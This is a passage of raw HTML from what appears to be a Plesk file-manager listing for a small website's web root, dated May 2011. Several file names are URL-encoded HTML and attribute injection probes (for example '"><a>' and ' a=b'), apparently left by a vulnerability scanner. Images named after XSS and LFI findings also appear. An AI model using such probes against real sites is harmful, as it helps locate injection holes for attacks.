href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=edit&amp;file=%2520a%253db%25202d0878db96d" onClick="return bin();;lon();">%20a%3db%202d0878db96d</a></td><td class="number">217&nbsp;KB</td><td class="number">May 23, 2011 03:10 PM</td><td><A href="http://nosedivesailing.com/%20a%3db%202d0878db96d" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=%2520a%253db%25202d0878db96d" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F%2520a%253db%25202d0878db96d" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=%2520a%253db%25202d0878db96d" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_%20a%3db%20c23f52e7ba1" value="%20a%3db%20c23f52e7ba1" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708" onMouseOver="f(event, &#039;unknown_binary&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_binary.gif" width="16" height="16" alt="file_binary.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=edit&amp;file=%2520a%253db%2520c23f52e7ba1" onClick="return bin();;lon();">%20a%3db%20c23f52e7ba1</a></td><td class="number">217&nbsp;KB</td><td class="number">May 23, 2011 03:09 PM</td><td><A href="http://nosedivesailing.com/%20a%3db%20c23f52e7ba1" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=%2520a%253db%2520c23f52e7ba1" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F%2520a%253db%2520c23f52e7ba1" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=%2520a%253db%2520c23f52e7ba1" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="evenrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_064a7066601" value="064a7066601" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708" onMouseOver="f(event, &#039;unknown_binary&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_binary.gif" width="16" height="16" alt="file_binary.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=edit&amp;file=064a7066601" onClick="return bin();;lon();">064a7066601</a></td><td class="number">217&nbsp;KB</td><td class="number">May 23, 2011 03:10 PM</td><td><A href="http://nosedivesailing.com/064a7066601" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=064a7066601" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F064a7066601" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=064a7066601" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_1-lfi-mod.JPG" value="1-lfi-mod.JPG" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=show&amp;file=1-lfi-mod.JPG" onClick=";lon();" onMouseOver="f(event, &#039;image&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_image.gif" width="16" height="16" alt="file_image.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=show&amp;file=1-lfi-mod.JPG" onClick=";lon();">1-lfi-mod.JPG</a></td><td class="number">217&nbsp;KB</td><td class="number">May 23, 2011 02:35 PM</td><td><A href="http://nosedivesailing.com/1-lfi-mod.JPG" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=1-lfi-mod.JPG" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F1-lfi-mod.JPG" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=1-lfi-mod.JPG" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="evenrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_1-lfi-mod.JPGfdf080d99066333a3eca3950" value="1-lfi-mod.JPGfdf080d99066333a3eca3950" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708" onMouseOver="f(event, &#039;unknown_binary&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_binary.gif" width="16" height="16" alt="file_binary.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=edit&amp;file=1-lfi-mod.JPGfdf080d99066333a3eca3950" onClick="return bin();;lon();">1-lfi-mod.JPGfdf080d99066333a3eca3950</a></td><td class="number">217&nbsp;KB</td><td class="number">May 23, 2011 02:35 PM</td><td><A href="http://nosedivesailing.com/1-lfi-mod.JPGfdf080d99066333a3eca3950" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=1-lfi-mod.JPGfdf080d99066333a3eca3950" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F1-lfi-mod.JPGfdf080d99066333a3eca3950" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=1-lfi-mod.JPGfdf080d99066333a3eca3950" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_1dac1%2522a%253d%2522b%2522064a7066601" value="1dac1%2522a%253d%2522b%2522064a7066601" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708" onMouseOver="f(event, &#039;unknown_binary&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_binary.gif" width="16" height="16" alt="file_binary.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=edit&amp;file=1dac1%252522a%25253d%252522b%252522064a7066601" onClick="return bin();;lon();">1dac1%2522a%253d%2522b%2522064a7066601</a></td><td class="number">217&nbsp;KB</td><td class="number">May 23, 2011 03:10 PM</td><td><A href="http://nosedivesailing.com/1dac1%2522a%253d%2522b%2522064a7066601" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=1dac1%252522a%25253d%252522b%252522064a7066601" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F1dac1%252522a%25253d%252522b%252522064a7066601" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=1dac1%252522a%25253d%252522b%252522064a7066601" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="evenrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_25e31e30568" value="25e31e30568" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708" onMouseOver="f(event, &#039;unknown_binary&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_binary.gif" width="16" height="16" alt="file_binary.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=edit&amp;file=25e31e30568" onClick="return bin();;lon();">25e31e30568</a></td><td class="number">217&nbsp;KB</td><td class="number">May 23, 2011 03:09 PM</td><td><A href="http://nosedivesailing.com/25e31e30568" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=25e31e30568" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F25e31e30568" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=25e31e30568" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_2a790%253ca%253e05dd7ec7ca9" value="2a790%253ca%253e05dd7ec7ca9" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708" onMouseOver="f(event, &#039;unknown_binary&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_binary.gif" width="16" height="16" alt="file_binary.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=edit&amp;file=2a790%25253ca%25253e05dd7ec7ca9" onClick="return bin();;lon();">2a790%253ca%253e05dd7ec7ca9</a></td><td class="number">217&nbsp;KB</td><td class="number">May 23, 2011 03:10 PM</td><td><A href="http://nosedivesailing.com/2a790%253ca%253e05dd7ec7ca9" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=2a790%25253ca%25253e05dd7ec7ca9" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F2a790%25253ca%25253e05dd7ec7ca9" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=2a790%25253ca%25253e05dd7ec7ca9" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="evenrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_2ef80%2522%2520a%253db%2520c23f52e7ba1" value="2ef80%2522%2520a%253db%2520c23f52e7ba1" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708" onMouseOver="f(event, &#039;unknown_binary&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_binary.gif" width="16" height="16" alt="file_binary.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=edit&amp;file=2ef80%252522%252520a%25253db%252520c23f52e7ba1" onClick="return bin();;lon();">2ef80%2522%2520a%253db%2520c23f52e7ba1</a></td><td class="number">217&nbsp;KB</td><td class="number">May 23, 2011 03:09 PM</td><td><A href="http://nosedivesailing.com/2ef80%2522%2520a%253db%2520c23f52e7ba1" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=2ef80%252522%252520a%25253db%252520c23f52e7ba1" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F2ef80%252522%252520a%25253db%252520c23f52e7ba1" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=2ef80%252522%252520a%25253db%252520c23f52e7ba1" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_302br.net-xss-2.jpg" value="302br.net-xss-2.jpg" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=show&amp;file=302br.net-xss-2.jpg" onClick=";lon();" onMouseOver="f(event, &#039;image&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_image.gif" width="16" height="16" alt="file_image.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=show&amp;file=302br.net-xss-2.jpg" onClick=";lon();">302br.net-xss-2.jpg</a></td><td class="number">65.0&nbsp;KB</td><td class="number">May 23, 2011 03:10 PM</td><td><A href="http://nosedivesailing.com/302br.net-xss-2.jpg" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=302br.net-xss-2.jpg" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F302br.net-xss-2.jpg" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=302br.net-xss-2.jpg" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="evenrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_302br.net-xss-2.jpgfdf080d93392bd957db5b4d5" value="302br.net-xss-2.jpgfdf080d93392bd957db5b4d5" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708" onMouseOver="f(event, &#039;unknown_binary&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_binary.gif" width="16" height="16" alt="file_binary.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=edit&amp;file=302br.net-xss-2.jpgfdf080d93392bd957db5b4d5" onClick="return bin();;lon();">302br.net-xss-2.jpgfdf080d93392bd957db5b4d5</a></td><td class="number">65.0&nbsp;KB</td><td class="number">May 23, 2011 02:35 PM</td><td><A href="http://nosedivesailing.com/302br.net-xss-2.jpgfdf080d93392bd957db5b4d5" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=302br.net-xss-2.jpgfdf080d93392bd957db5b4d5" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F302br.net-xss-2.jpgfdf080d93392bd957db5b4d5" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=302br.net-xss-2.jpgfdf080d93392bd957db5b4d5" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_3e50b%2522%253e%253ca%253e8f0ee00628" value="3e50b%2522%253e%253ca%253e8f0ee00628" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708" onMouseOver="f(event, &#039;unknown_binary&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_binary.gif" width="16" height="16" alt="file_binary.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=edit&amp;file=3e50b%252522%25253e%25253ca%25253e8f0ee00628" onClick="return bin();;lon();">3e50b%2522%253e%253ca%253e8f0ee00628</a></td><td class="number">217&nbsp;KB</td><td class="number">May 23, 2011 03:09 PM</td><td><A href="http://nosedivesailing.com/3e50b%2522%253e%253ca%253e8f0ee00628" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=3e50b%252522%25253e%25253ca%25253e8f0ee00628" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F3e50b%252522%25253e%25253ca%25253e8f0ee00628" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=3e50b%252522%25253e%25253ca%25253e8f0ee00628" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="evenrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_3M.COM-XSS-1.JPG" value="3M.COM-XSS-1.JPG" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=show&amp;file=3M.COM-XSS-1.JPG" onClick=";lon();" onMouseOver="f(event, &#039;image&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_image.gif" width="16" height="16" alt="file_image.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=show&amp;file=3M.COM-XSS-1.JPG" onClick=";lon();">3M.COM-XSS-1.JPG</a></td><td class="number">279&nbsp;KB</td><td class="number">May 23, 2011 02:35 PM</td><td><A href="http://nosedivesailing.com/3M.COM-XSS-1.JPG" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=3M.COM-XSS-1.JPG" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F3M.COM-XSS-1.JPG" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=3M.COM-XSS-1.JPG" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_3M.COM-XSS-1.JPGfdf080d921773c427dce8684" value="3M.COM-XSS-1.JPGfdf080d921773c427dce8684" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708" onMouseOver="f(event, &#039;unknown_binary&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_binary.gif" width="16" height="16" alt="file_binary.gif" title=""></a></td><td><A 